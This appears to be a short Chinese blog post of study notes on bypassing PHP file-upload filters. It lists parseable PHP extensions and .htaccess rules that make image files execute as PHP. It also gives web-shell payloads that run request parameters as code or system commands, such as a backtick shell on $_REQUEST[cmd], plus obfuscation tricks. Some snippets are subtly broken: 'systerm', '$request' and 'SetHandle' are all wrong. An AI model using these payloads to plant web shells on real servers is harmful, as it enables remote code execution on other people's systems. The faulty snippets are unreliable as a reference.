一、后缀名绕过

1、默认情况下,lamp会将php\phtml\php3\php4\php5\pht等文件解析为php

1、php\php5\php4\php3\php2\phtml\pht

 2、特殊后缀.htaccess/.user.ini

.htaccess  //.htaccess是apache的配置文件,只能在存在apache的中间件时才能生效。定义了重写当前目录下的解析规则
AddType application/x-httpd-php .jpg /将当前目录下的jpg文件解析为php文件
SetHandle application/x-httpd-php //将当前目录下的所所有文件解析为php文件

二、内容过滤

<? 过滤:绕过方法 <script language>eval($_request[x]);</script>  //php版本<7
php过滤:短标签<?=ls?> //直接执行系统命令没有输出; <?=`ls`?>//直接执行系统命令有输出; <?=`$_REQUEST[cmd]`?> //cmd直接执行系统命令
eval过滤:
  换函数,assert\system
  大小写绕过:
  动态拼接:$a='sys';$b='term';$c=$a.$b;<?php $c($request[x]);?> //eval函数不能拼接,assert、system可以
运算:异或运算
  

 

posted on 2022-11-02 10:02  牧羊大哥  阅读(40)  评论(0编辑  收藏  举报